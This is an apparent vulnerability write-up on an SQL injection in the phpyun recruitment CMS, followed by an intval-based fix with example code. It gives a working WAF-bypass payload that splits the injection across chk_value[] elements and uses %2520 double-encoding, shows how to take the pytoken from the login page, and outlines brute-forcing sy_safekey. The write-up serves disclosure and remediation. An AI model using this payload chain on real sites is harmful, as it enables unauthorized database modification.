Phpyun: an SQL injection with a difficult 360 bypass, and the fix
Finding an SQL injection in phpyun is genuinely hard. I first found one injection point, and even that was not easy.
In phpyun/model/class/action.class.php:
```php
function get_admin_user_shell() {
    if ($_SESSION['auid'] && $_SESSION['ashell']) {
        $row = $this->admin_get_user_shell($_SESSION['auid'], $_SESSION['ashell']);
        if (!$row) {
            $this->logout();
            echo "operation not permitted!";
            die;
        }
        if ($_GET['m'] == "" || $_GET['m'] == "index" || $_GET['m'] == "ajax" || $_GET['m'] == "admin_nav") {
            $_GET['m'] = "admin_right";
        }
        $c = $_GET['c'];
        $m = $_GET['m'];
        if ($_GET['m'] != "admin_right") {
            $url = $_GET['m'] == "cache" ? "index.php?m=" . $m . "&c=" . $c : "index.php?m=" . $m;
            $nav = $this->get_shell($row["m_id"], $url);
            if (!$nav) {
                $this->logout();
                echo "operation not permitted!";
                die;
            }
        }
    } else {
        // no admin session: the request is only rejected when m is non-empty
        if ($_GET['m'] != "") {
            $this->logout();
            echo "does not have permission to operate!";
            die;
        }
    }
}
```
Note the else branch:
```php
if ($_GET['m'] != "") {
```
Without an admin session, the request is only rejected when m is non-empty. So as long as m is empty, this back-end action can be reached by anyone, and exactly one such action contains an SQL injection.
In /phpyun/admin/model/index.class.php:
```php
function shortcut_menu_action() {
    if ($_POST['chk_value']) {
        $this->obj->DB_update_all("admin_navigation", "`menu`='1'", "`menu`='2'");
        echo "`id` in(" . @implode(',', $_POST['chk_value']) . ")";
        $this->obj->DB_update_all("admin_navigation", "`menu`='2'", "`id` in(" . @implode(',', $_POST['chk_value']) . ")");
        echo 1;
        die;
    }
}
```
$_POST['chk_value'] comes straight from the POST body and is concatenated straight into the SQL statement.
But to POST anything at all you still need a valid pytoken. How do you get one?
```php
function admin() {
    $r = $this->obj->get_admin_user_shell();
    $this->registrs();
    if ($_POST) {
        if ($_POST['pytoken'] != $_SESSION['pytoken']) {
            unset($_POST['pytoken']);
            $this->obj->ACT_layer_msg("the source address is invalid!", 3, $this->config['sy_weburl']);
        }
    }
    if (!$_SESSION['pytoken']) {
        $_SESSION['pytoken'] = substr(md5(uniqid() . $_SESSION['auid'] . $_SESSION['ausername'] . $_SESSION['ashell']), 8, 12);
    }
    $this->yunset('pytoken', $_SESSION['pytoken']);
}
```
Note the check:
```php
if ($_POST['pytoken'] != $_SESSION['pytoken']) {
    unset($_POST['pytoken']);
    $this->obj->ACT_layer_msg("the source address is invalid!", 3, $this->config['sy_weburl']);
}
```
This is no obstacle, though: the token is generated for every session, logged in or not, and handed to the template, so it is available on the login page itself at http://localhost:8038/phpyun/admin.
Now comes the hard part: the 360 defense.
Let's try the simplest payload, `or 1=1`. As you can see, 360 catches it. (I changed the 360 intercept iframe page to just echo the text `360`.)
Look in data/db.safety.php for the corresponding code. How do we get past it?
```php
$postfilter = "<.*=(&#\\d+?;?)+?>|<.*data=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\\(\d+?|sleep\s*?\\([\d\.]+?\\)|load_file\s*?\\()|<[^>]*?\\b(onerror|onmousemove|onload|onclick|onmouseover)\\b|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.+?\\*\\/|\\/\\*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT(\\(.+\\)|\\s+?.+?)|UPDATE(\\(.+\\)|\\s+?.+?)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?)FROM(\\(.+\\)|\\s+?.+?)|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)";
```
How can we bypass it? Put simply, the payload only has to be spread over several array elements.
But then a new situation appears: `or` has been replaced with `Or`.
The code responsible is as follows:
```php
function gpc2sql($str) {
    // hard stop on the most dangerous keywords
    if (preg_match("/select|insert|update|delete|union|into|load_file|outfile/is", $str)) {
        exit(safe_pape());
    }
    // replacement table, applied in this order
    $arr = array(
        " and "    => " an d ",
        " or "     => " Or ",
        "%20"      => "",
        "select"   => "Select",
        "update"   => "Update",
        "count"    => "Count",
        "chr"      => "Chr",
        "truncate" => "Truncate",
        "union"    => "Union",
        "delete"   => "Delete",
        "insert"   => "Insert"
    );
    foreach ($arr as $key => $v) {
        $str = preg_replace('/' . $key . '/isU', $v, $str);
    }
    return $str; // rest of the function not shown on the page
}
```
There are two ways to avoid the replacement.
1. `"%20" => ""`
Look at that entry: `%20` is replaced with nothing, so we only need to submit
`chk_value[]=1) o%2520r /*&chk_value[]=*/1=1#&pytoken=9a54d50f315b`
The web server decodes `%2520` to `%20`, and the filter then deletes `%20`, leaving `or`.
This only works because `and` and `or` come before `%20` in the array; `select` comes after it, so the same trick does not work for `select`. On to method 2.
2. The safekey check:
```php
if ($config['sy_istemplate'] != '1' || md5(md5($config['sy_safekey']) . $_GET['m']) != $_POST['safekey'])
```
So you only need to know sy_safekey to inject freely. How is sy_safekey generated?
```php
$r = rand(10000000, 99999999);
mysql_query("update $table_config set `config`='$r' where `name`='sy_safekey'");
```
If all we want is to make the server hang or probe the current database environment, that is easy: we can sleep, or read information about the running database, anything that does not depend on the `select` keyword.
But to do more, we need to write a program that posts safekey to http://localhost:8038//phpyun/index.php?m=com&c=search&keyword=count, up to 79.99 million times, until the returned keyword comes back as `count` rather than `Count`. Then you have sy_safekey and can do whatever you want.
Solution:
Run intval() over every element of chk_value in a foreach before building the IN list.
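The fix applied to the WHERE-clause construction, as an added example (not phpyun's own code): the unfiltered original beside the intval-per-element version. `DB_update_all()` is a stub standing in for phpyun's DB layer; it assumes, as the page's call shows, that the third argument is concatenated as the WHERE clause.

```php
<?php
// Added example, not phpyun's code. Stub for phpyun's DB layer (assumption:
// the third argument is concatenated verbatim as the WHERE clause).
function DB_update_all($table, $set, $where) {
    return "UPDATE `$table` SET $set WHERE $where";
}

// Vulnerable: every chk_value[] element is concatenated as-is, exactly as in
// shortcut_menu_action(); a /* ... */ comment can join two elements.
function build_where_vulnerable(array $chk_value) {
    return "`id` in(" . @implode(',', $chk_value) . ")";
}

// Fixed, as the page proposes: intval() each element in a foreach, so only
// integers can reach the IN list. Non-positive results are dropped, and an
// empty list is refused rather than emitting "in()", which MySQL rejects.
function build_where_fixed(array $chk_value) {
    $ids = array();
    foreach ($chk_value as $v) {
        $id = intval($v);
        if ($id > 0) {
            $ids[] = $id;
        }
    }
    if (!$ids) {
        return false;
    }
    return "`id` in(" . implode(',', array_unique($ids)) . ")";
}

// Constructed input: the two array elements from the page's payload, as they
// look after the web server decoded %2520 to %20 and the filter stripped %20.
$chk_value = array("1) or /*", "*/1=1#");

echo "vulnerable: ", DB_update_all("admin_navigation", "`menu`='2'", build_where_vulnerable($chk_value)), "\n";

$where = build_where_fixed($chk_value);
echo "fixed:      ", ($where === false ? "request rejected" : DB_update_all("admin_navigation", "`menu`='2'", $where)), "\n";
```

The first query still carries the comment-joined `or 1=1` condition, so it updates every row; the second reduces the same input to the single id 1 and nothing else.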